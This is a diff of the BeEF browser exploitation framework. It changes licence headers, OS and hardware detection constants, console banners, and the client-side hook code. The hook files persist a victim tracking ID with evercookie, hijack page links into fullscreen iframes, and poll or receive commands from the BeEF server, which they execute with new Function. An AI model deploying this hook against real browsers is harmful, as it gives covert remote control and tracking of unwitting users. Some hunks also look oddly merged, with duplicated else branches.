+		if(this.isWin311())        return 'Windows 3.11';
-		if(this.isWinNT4()) return 'Windows NT 4';
+		if(this.isWinNT4())        return 'Windows NT 4';
-		if(this.isWin95()) return 'Windows 95';
+		if(this.isWinCE())         return 'Windows CE';
-		if(this.isWin98()) return 'Windows 98';
+		if(this.isWin95())         return 'Windows 95';
-		if(this.isWinME()) return 'Windows Millenium';
+		if(this.isWin98())         return 'Windows 98';
-		if(this.isWin2000()) return 'Windows 2000';
+		if(this.isWinME())         return 'Windows Millenium';
-		if(this.isWinXP()) return 'Windows XP';
+		if(this.isWin2000())       return 'Windows 2000';
 		if(this.isWin2000SP1())    return 'Windows 2000 SP1';
 		if(this.isWinXP())         return 'Windows XP';
 		if(this.isWinServer2003()) return 'Windows Server 2003';
-		if(this.isWinVista()) return 'Windows Vista';
+		if(this.isWinVista())      return 'Windows Vista';
-		if(this.isWin7()) return 'Windows 7';
+		if(this.isWin7())          return 'Windows 7';
 		if(this.isWin8())          return 'Windows 8';
 		//Nokia
 		if(this.isNokia()) {
@@ -139,11 +156,14 @@ beef.os = {
 		if(this.isSunOS()) return 'Sun OS';
 		//iPhone
-		if (this.isIphone()) return 'iPhone';
+		if (this.isIphone()) return 'iOS';
 		//iPad
-		if (this.isIpad()) return 'iPad';
+		if (this.isIpad()) return 'iOS';
 		//iPod
-		if (this.isIpod()) return 'iPod';
+		if (this.isIpod()) return 'iOS';
 		// zune
 		//if (this.isZune()) return 'Zune';
 		//macintosh
 		if(this.isMacintosh()) {
@@ -156,6 +176,7 @@ beef.os = {
 		//others
 		if(this.isQNX()) return 'QNX';
 		if(this.isBeOS()) return 'BeOS';
 		if(this.isWebOS()) return 'webOS';
 		return 'unknown';
 	}
--- a/core/main/client/session.js
+++ b/core/main/client/session.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-//
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
-//   Licensed under the Apache License, Version 2.0 (the "License");
+// See the file 'doc/COPYING' for copying permission
 //   you may not use this file except in compliance with the License.
 //   You may obtain a copy of the License at
 //
 //       http://www.apache.org/licenses/LICENSE-2.0
 //
 //   Unless required by applicable law or agreed to in writing, software
 //   distributed under the License is distributed on an "AS IS" BASIS,
 //   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 //   See the License for the specific language governing permissions and
 //   limitations under the License.
 //
 /*!
 * @literal object: beef.session
 *
@@ -22,7 +13,8 @@ beef.session = {
 	hook_session_id_length: 80,
 	hook_session_id_chars: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",	
-	ec: new evercookie(),	
+	ec: new evercookie(),
    beefhook: "<%= @hook_session_name %>",
 	/**
 	 * Gets a string which will be used to identify the hooked browser session
@@ -31,12 +23,12 @@ beef.session = {
 	 */
  	get_hook_session_id: function() {
 		// check if the browser is already known to the framework
-		var id = this.ec.evercookie_cookie("BEEFHOOK");
+		var id = this.ec.evercookie_cookie(beef.session.beefhook);
 		if (typeof id == 'undefined') {
-			var id = this.ec.evercookie_userdata("BEEFHOOK");
+			var id = this.ec.evercookie_userdata(beef.session.beefhook);
 		}
 		if (typeof id == 'undefined') {
-			var id = this.ec.evercookie_window("BEEFHOOK");
+			var id = this.ec.evercookie_window(beef.session.beefhook);
 		}
 		// if the browser is not known create a hook session id and set it
@@ -56,9 +48,9 @@ beef.session = {
 	 */
  	set_hook_session_id: function(id) {
 		// persist the hook session id
-		this.ec.evercookie_cookie("BEEFHOOK", id);
+		this.ec.evercookie_cookie(beef.session.beefhook, id);
-		this.ec.evercookie_userdata("BEEFHOOK", id);
+		this.ec.evercookie_userdata(beef.session.beefhook, id);
-		this.ec.evercookie_window("BEEFHOOK", id);
+		this.ec.evercookie_window(beef.session.beefhook, id);
 	},
 	/**
@@ -77,26 +69,7 @@ beef.session = {
 		}
 		return hook_session_id;
 	},
 	/**
 	 * Overrides each link, and creates an iframe (loading the href) instead of following the link
 	 */
 	persistent: function() {
 		$j('a').click(function(e) {
 			if ($j(this).attr('href') != '')
 			{
 				e.preventDefault();
 				beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
 				$j(document).attr('title', $j(this).html());
 				document.body.scroll = "no";
 				document.documentElement.style.overflow = 'hidden';
 			}
 		});
 	}
 };
 beef.regCmp('beef.session');
--- a/core/main/client/timeout.js
+++ b/core/main/client/timeout.js
@@ -0,0 +1,17 @@
 //
 // Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 /*
 Sometimes there are timing issues and looks like beef_init
 is not called at all (always in cross-domain situations,
 for example calling the hook with jquery getScript,
 or sometimes with event handler injections).
 To fix this, we call again beef_init after 1 second.
 Cheers to John Wilander that discussed this bug with me at OWASP AppSec Research Greece
 antisnatchor
 */
 setTimeout(beef_init, 1000);
--- a/core/main/client/updater.js
+++ b/core/main/client/updater.js
@@ -1,29 +1,21 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-//
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
-//   Licensed under the Apache License, Version 2.0 (the "License");
+// See the file 'doc/COPYING' for copying permission
 //   you may not use this file except in compliance with the License.
 //   You may obtain a copy of the License at
 //
 //       http://www.apache.org/licenses/LICENSE-2.0
 //
 //   Unless required by applicable law or agreed to in writing, software
 //   distributed under the License is distributed on an "AS IS" BASIS,
 //   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 //   See the License for the specific language governing permissions and
 //   limitations under the License.
 //
 /*!
 * @Literal object: beef.updater
 *
 * Object in charge of getting new commands from the BeEF framework and execute them.
 * The XHR-polling channel is managed here. If WebSockets are enabled,
 * websocket.ls is used instead.
 */
 beef.updater = {
-	// Low timeouts combined with the way the framework sends commamd modules result 
+	// XHR-polling timeout.
-	// in instructions being sent repeatedly or complex code. 
+    xhr_poll_timeout: "<%= @xhr_poll_timeout %>",
-	// If you suffer from ADHD, you can decrease this setting.
+    beefhook: "<%= @hook_session_name %>",
 	timeout: 5000,
 	// A lock.
 	lock: false,
@@ -51,22 +43,22 @@ beef.updater = {
 			beef.net.flush();
 			if(beef.commands.length > 0) {
 				this.execute_commands();
-			}
+			}else {
            else {
 				this.get_commands();    /*Polling*/
 			}
 		}
      // ( typeof beef.websocket === "undefined")
-		setTimeout("beef.updater.check();", beef.updater.timeout);
+		setTimeout("beef.updater.check();", beef.updater.xhr_poll_timeout);
 	},
-	// Gets new commands from the framework.
+    /**
-	get_commands: function(http_response) {
+     * Gets new commands from the framework.
     */
 	get_commands: function() {
 		try {
 			this.lock = true;
-            beef.net.request('http', 'GET', beef.net.host, beef.net.port, beef.net.hook, null, 'BEEFHOOK='+beef.session.get_hook_session_id(), 1, 'script', function(response) {
+            beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, beef.updater.beefhook+'='+beef.session.get_hook_session_id(), 5, 'script', function(response) {
                if (response.body != null && response.body.length > 0)
                    beef.updater.execute_commands();
            });
@@ -77,13 +69,12 @@ beef.updater = {
 		this.lock = false;
 	},
-	// Executes the received commands if any.
+    /**
     * Executes the received commands, if any.
     */
 	execute_commands: function() {
 		if(beef.commands.length == 0) return;
 		this.lock = true;
 		/*here execute the command */
 		while(beef.commands.length > 0) {
 			command = beef.commands.pop();
 			try {
@@ -92,7 +83,6 @@ beef.updater = {
 				console.error('execute_commands - command failed to execute: ' + e.message);
 			}
 		}
 		this.lock = false;
 	}
 };
--- a/core/main/client/websocket.js
+++ b/core/main/client/websocket.js
@@ -1,72 +1,91 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-//
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
-//   Licensed under the Apache License, Version 2.0 (the "License");
+// See the file 'doc/COPYING' for copying permission
 //   you may not use this file except in compliance with the License.
 //   You may obtain a copy of the License at
 //
 //       http://www.apache.org/licenses/LICENSE-2.0
 //
 //   Unless required by applicable law or agreed to in writing, software
 //   distributed under the License is distributed on an "AS IS" BASIS,
 //   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 //   See the License for the specific language governing permissions and
 //   limitations under the License.
 //
-//beef.websocket.socket.send(take answer to server beef)
+
-/*New browser init call this */
+/**
 * @Literal object: beef.websocket
 *
 * Manage the WebSocket communication channel.
 * This channel is much faster and responsive, and it's used automatically
 * if the browser supports WebSockets AND beef.http.websocket.enable = true.
 */
 beef.websocket = {
    socket:null,
-    alive_timer:<%= @websocket_timer %>,
+    ws_poll_timeout: "<%= @ws_poll_timeout %>",
    /**
     * Initialize the WebSocket client object.
     * Note: use WebSocketSecure only if the hooked domain is under https.
     * Mixed-content in WS is quite different from a non-WS context.
     */
    init:function () {
        var webSocketServer = beef.net.host;
-        var webSocketPort = <%= @websocket_port %>;
+        var webSocketPort = "<%= @websocket_port %>";
-        var webSocketSecure = <%= @websocket_secure %>;
+        var webSocketSecure = "<%= @websocket_secure %>";
        var protocol = "ws://";
-        if(webSocketSecure)
+        if(webSocketSecure && window.location.protocol=="https:"){
            protocol = "wss://";
            webSocketPort= "<%= @websocket_sec_port %>";
        }
        if (beef.browser.isFF() && !!window.MozWebSocket) {
            beef.websocket.socket = new MozWebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
-
+        }else{
        } else {
            beef.websocket.socket = new WebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
        }
    },
-    /* send Helo message to the BeEF server and start async communication*/
+
    /**
     * Send Helo message to the BeEF server and start async polling.
     */
    start:function () {
        new beef.websocket.init();
        this.socket.onopen = function () {
            //console.log("Socket has been opened!");
            /*send browser id*/
            beef.websocket.send('{"cookie":"' + beef.session.get_hook_session_id() + '"}');
            //console.log("Connected and Helo");
            beef.websocket.alive();
-        }
+        };
        this.socket.onmessage = function (message) {
-            //console.log("Received message via WS."+ message.data);
+            // Data coming from the WebSocket channel is either of String, Blob or ArrayBufferdata type.
-            eval(message.data);
+            // That's why it needs to be evaluated first. Using Function is a bit better than pure eval().
-        }
+            // It's not a big deal anyway, because the eval'ed data comes from BeEF itself, so it is implicitly trusted.
            new Function(message.data)();
        };
        this.socket.onclose = function () {
            setTimeout(function(){beef.websocket.start()}, 5000);
        };
    },
    /**
     * Send data back to BeEF. This is basically the same as beef.net.send,
     * but doesn't queue commands.
     * Example usage:
     * beef.websocket.send('{"handler" : "' + handler + '", "cid" :"' + cid +
     * '", "result":"' + beef.encode.base64.encode(beef.encode.json.stringify(results)) +
     * '","callback": "' + callback + '","bh":"' + beef.session.get_hook_session_id() + '" }');
     */
    send:function (data) {
-        this.socket.send(data);
+        try {
-//        console.log("Sent [" + data + "]");
+            this.socket.send(data);
        }catch(err){}
    },
    /**
     * Polling mechanism, to notify the BeEF server that the browser is still hooked,
     * and the WebSocket channel still alive.
     * todo: there is probably a more efficient way to do this. Double-check WebSocket API.
     */
    alive: function (){
        beef.websocket.send('{"alive":"'+beef.session.get_hook_session_id()+'"}');
-//        console.log("sent alive");
+        setTimeout("beef.websocket.alive()", beef.websocket.ws_poll_timeout);
        setTimeout("beef.websocket.alive()", beef.websocket.alive_timer);
    }
 };
--- a/core/main/command.rb
+++ b/core/main/command.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
--- a/core/main/configuration.rb
+++ b/core/main/configuration.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
--- a/core/main/console/banners.rb
+++ b/core/main/console/banners.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
 module Core
@@ -40,12 +30,13 @@ module Banners
    def print_welcome_msg
        config = BeEF::Core::Configuration.instance
        version = config.get('beef.version')
-        print_info "Browser Exploitation Framework (BeEF)"
+        print_info "Browser Exploitation Framework (BeEF) #{version}"
-        data =  "Version #{version}\n"
+        data = "Twit: @beefproject\n"
-        data += "Website http://beefproject.com\n"
+        data += "Site: http://beefproject.com\n"
-        data += "Run 'beef -h' for basic help.\n"
+        data += "Blog: http://blog.beefproject.com\n"
-        data += "Run 'git pull' to update to the latest revision."
+        data += "Wiki: https://github.com/beefproject/beef/wiki\n"
        print_more data
        print_info "Project Creator: " + "Wade Alcorn".red + " (@WadeAlcorn)"
    end
    #
@@ -89,12 +80,13 @@ module Banners
    def print_network_interfaces_routes
      configuration = BeEF::Core::Configuration.instance
      prototxt = configuration.get("beef.http.https.enable") == true ? "https" : "http"
      self.interfaces.map do |host| # display the important URLs on each interface from the interfaces array
        print_success "running on network interface: #{host}"
        beef_host = configuration.get("beef.http.public_port") || configuration.get("beef.http.port")
-        data = "Hook URL: http://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.hook_file")}\n"
+        data = "Hook URL: #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.hook_file")}\n"
-        data += "UI URL:   http://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.panel_path")}\n"
+        data += "UI URL:   #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.panel_path")}\n"
        print_more data
      end
@@ -105,13 +97,12 @@ module Banners
    #
    def print_loaded_extensions
      extensions = BeEF::Extensions.get_loaded
-      print_info "#{extensions.size} extensions loaded:"
+      print_info "#{extensions.size} extensions enabled."
      output = ''
-      
+
-      
+      #extensions.each do |key,ext|
-      extensions.each do |key,ext|
+      #  output += "#{ext['name']}\n"
-        output += "#{ext['name']}\n"
+      #end
      end
      print_more output
    end
--- a/core/main/console/commandline.rb
+++ b/core/main/console/commandline.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
  module Core
--- a/core/main/constants/browsers.rb
+++ b/core/main/constants/browsers.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
--- a/core/main/constants/commandmodule.rb
+++ b/core/main/constants/commandmodule.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
--- a/core/main/constants/distributedengine.rb
+++ b/core/main/constants/distributedengine.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
--- a/core/main/constants/hardware.rb
+++ b/core/main/constants/hardware.rb
@@ -0,0 +1,81 @@
 #
 # Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
 module Constants
  # @note The hardware's strings for hardware detection.
  module Hardware
    HW_UNKNOWN_IMG        = 'pc.png'
 	HW_VM_IMG             = 'vm.png'
 	HW_LAPTOP_IMG         = 'laptop.png'
 	HW_IPHONE_UA_STR      = 'iPhone'
 	HW_IPHONE_IMG         = 'iphone.jpg'
 	HW_IPAD_UA_STR	      = 'iPad'
 	HW_IPAD_IMG	          = 'ipad.png'
 	HW_IPOD_UA_STR	      = 'iPod'
 	HW_IPOD_IMG	          = 'ipod.jpg'
 	HW_BLACKBERRY_UA_STR  = 'BlackBerry'
 	HW_BLACKBERRY_IMG     = 'blackberry.png'
 	HW_WINPHONE_UA_STR    = 'Windows Phone'
 	HW_WINPHONE_IMG       = 'win.png'
    HW_ZUNE_UA_STR        = 'ZuneWP7'
    HW_ZUNE_IMG           = 'zune.gif'
 	HW_KINDLE_UA_STR      = 'Kindle'
 	HW_KINDLE_IMG         = 'kindle.png'
 	HW_NOKIA_UA_STR       = 'Nokia'
 	HW_NOKIA_IMG          = 'nokia.ico'
 	HW_HTC_UA_STR         = 'HTC'
 	HW_HTC_IMG            = 'htc.ico'
 	HW_MOTOROLA_UA_STR    = 'motorola'
 	HW_MOTOROLA_IMG       = 'motorola.png'
 	HW_GOOGLE_UA_STR      = 'Nexus One'
 	HE_GOOGLE_IM          = 'nexus.png'
 	HW_ERICSSON_UA_STR    = 'Ericsson'
 	HW_ERICSSON_IMG       = 'sony_ericsson.png'
 	HW_ALL_UA_STR         = 'All'
        # Attempt to match operating system string to constant
        # @param [String] name Name of operating system
        # @return [String] Constant name of matched operating system, returns 'ALL'  if nothing are matched
 		def self.match_hardware(name)
 			case name.downcase
 				when /iphone/
 					HW_IPHONE_UA_STR
 				when /ipad/
 					HW_IPAD_UA_STR
 				when /ipod/
 					HW_IPOD_UA_STR
 				when /blackberry/
 					HW_BLACKBERRY_UA_STR
 				when /windows phone/
 					HW_WINPHONE_UA_STR
 				when /zune/
 					HW_ZUNE_UA_STR
 				when /kindle/
 					HW_KINDLE_UA_STR
 				when /nokia/
 					HW_NOKIA_UA_STR
 				when /motorola/
 					HW_MOTOROLA_UA_STR
 				when /htc/
 					HW_HTC_UA_STR
 				when /google/
 					HW_GOOGLE_UA_STR
 				when /ericsson/
 					HW_ERICSSON_UA_STR
 				else
 					'ALL'
 				end
 		end
  end
 end
 end
 end
--- a/core/main/constants/os.rb
+++ b/core/main/constants/os.rb
@@ -1,89 +1,78 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
-module Core
+  module Core
-module Constants
+    module Constants
-  
+
-  # @note The OS'es strings for os detection.
+      # @note The OS'es strings for os detection.
-  module Os
+      module Os
-  
+
-    OS_UNKNOWN_IMG        = 'unknown.png'
+        OS_UNKNOWN_IMG = 'unknown.png'
-  	OS_WINDOWS_UA_STR     = 'Windows'
+        OS_WINDOWS_UA_STR = 'Windows'
-  	OS_WINDOWS_IMG        = 'win.png'
+        OS_WINDOWS_IMG = 'win.png'
-  	OS_LINUX_UA_STR       = 'Linux'
+        OS_LINUX_UA_STR = 'Linux'
-  	OS_LINUX_IMG          = 'linux.png'
+        OS_LINUX_IMG = 'linux.png'
-  	OS_MAC_UA_STR         = 'Mac'
+        OS_MAC_UA_STR = 'Mac'
-  	OS_MAC_IMG            = 'mac.png'
+        OS_MAC_IMG = 'mac.png'
-	OS_QNX_UA_STR	      = 'QNX'
+        OS_QNX_UA_STR = 'QNX'
-	OS_QNX_IMG	      = 'qnx.ico'
+        OS_QNX_IMG = 'qnx.ico'
-	OS_BEOS_UA_STR	      = 'BeOS'
+        OS_BEOS_UA_STR = 'BeOS'
-	OS_BEOS_IMG	      = 'beos.png'
+        OS_BEOS_IMG = 'beos.png'
-	OS_OPENBSD_UA_STR     = 'OpenBSD'
+        OS_OPENBSD_UA_STR = 'OpenBSD'
-	OS_OPENBSD_IMG	      = 'openbsd.ico'
+        OS_OPENBSD_IMG = 'openbsd.ico'
-	OS_IPHONE_UA_STR      = 'iPhone'
+        OS_IOS_UA_STR = 'iOS'
- 	OS_IPHONE_IMG         = 'iphone.png'
+        OS_IOS_IMG = 'ios.png'
-	OS_IPAD_UA_STR	      = 'iPad'
+        OS_IPHONE_UA_STR = 'iPhone'
-	OS_IPAD_IMG	      = 'ipad.png'
+        OS_WEBOS_UA_STR = 'webos.png'
-	OS_IPOD_UA_STR	      = 'iPod'
+        OS_IPHONE_IMG = 'iphone.jpg'
-	OS_IPOD_IMG	      = 'ipod.jpg'
+        OS_IPAD_UA_STR = 'iPad'
-	OS_MAEMO_UA_STR	      = 'Maemo'
+        OS_IPAD_IMG = 'ipad.png'
-	OS_MAEMO_IMG	      = 'maemo.ico'
+        OS_IPOD_UA_STR = 'iPod'
-	OS_BLACKBERRY_UA_STR  = 'BlackBerry'
+        OS_IPOD_IMG = 'ipod.jpg'
-	OS_BLACKBERRY_IMG     = 'blackberry.png'
+        OS_MAEMO_UA_STR = 'Maemo'
-	OS_ANDROID_UA_STR     = 'Android'
+        OS_MAEMO_IMG = 'maemo.ico'
-	OS_ANDROID_IMG        = 'android.png'
+        OS_BLACKBERRY_UA_STR = 'BlackBerry'
-    OS_ALL_UA_STR         = 'All'
+        OS_BLACKBERRY_IMG = 'blackberry.png'
        OS_ANDROID_UA_STR = 'Android'
        OS_ANDROID_IMG = 'android.png'
        OS_ALL_UA_STR = 'All'
        # Attempt to match operating system string to constant
        # @param [String] name Name of operating system
        # @return [String] Constant name of matched operating system, returns 'ALL'  if nothing are matched
-		def self.match_os(name)
+        def self.match_os(name)
-			case name.downcase
+          case name.downcase
-				when /win/
+            when /win/
-					OS_WINDOWS_UA_STR
+              OS_WINDOWS_UA_STR
-				when /lin/
+            when /lin/
-					OS_LINUX_UA_STR
+              OS_LINUX_UA_STR
-				when /os x/, /osx/, /mac/
+            when /os x/, /osx/, /mac/
-					OS_MAC_UA_STR
+              OS_MAC_UA_STR
-				when /qnx/
+            when /qnx/
-					OS_QNX_UA_STR
+              OS_QNX_UA_STR
-				when /beos/
+            when /beos/
-					OS_BEOS_UA_STR
+              OS_BEOS_UA_STR
-				when /openbsd/
+            when /openbsd/
-					OS_OPENBSD_UA_STR
+              OS_OPENBSD_UA_STR
-				when /iphone/
+            when /ios/, /iphone/, /ipad/, /ipod/
-					OS_IPHONE_UA_STR
+              OS_IOS_UA_STR
-				when /ipad/
+            when /maemo/
-					OS_IPAD_UA_STR
+              OS_MAEMO_UA_STR
-				when /ipod/
+            when /blackberry/
-					OS_IPOD_UA_STR
+              OS_BLACKBERRY_UA_STR
-				when /maemo/
+            when /android/
-					OS_MAEMO_UA_STR
+              OS_ANDROID_UA_STR
-				when /blackberry/
+            else
-					OS_BLACKBERRY_UA_STR
+              'ALL'
-				when /android/
+          end
-					OS_ANDROID_UA_STR
+        end
-				else
+
-					'ALL'
+      end
-				end
+
-		end
+    end
  end
 end
 end
 end
--- a/core/main/crypto.rb
+++ b/core/main/crypto.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
--- a/core/main/distributed_engine/models/rules.rb
+++ b/core/main/distributed_engine/models/rules.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
--- a/core/main/handlers/browserdetails.rb
+++ b/core/main/handlers/browserdetails.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
  module Core
@@ -34,6 +24,9 @@ module BeEF
        end
        def setup()
          print_debug "[INIT] Processing Browser Details..."
          config = BeEF::Core::Configuration.instance
          # validate hook session value
          session_id = get_param(@data, 'beefhook')
          (self.err_msg "session id is invalid"; return) if not BeEF::Filters.is_valid_hook_session_id?(session_id)
@@ -118,6 +111,14 @@ module BeEF
            self.err_msg "Invalid operating system name returned from the hook browser's initial connection."
          end
          # get and store the hardware name
          hw_name = get_param(@data['results'], 'Hardware')
          if BeEF::Filters.is_valid_hwname?(hw_name)
            BD.set(session_id, 'Hardware', hw_name)
          else
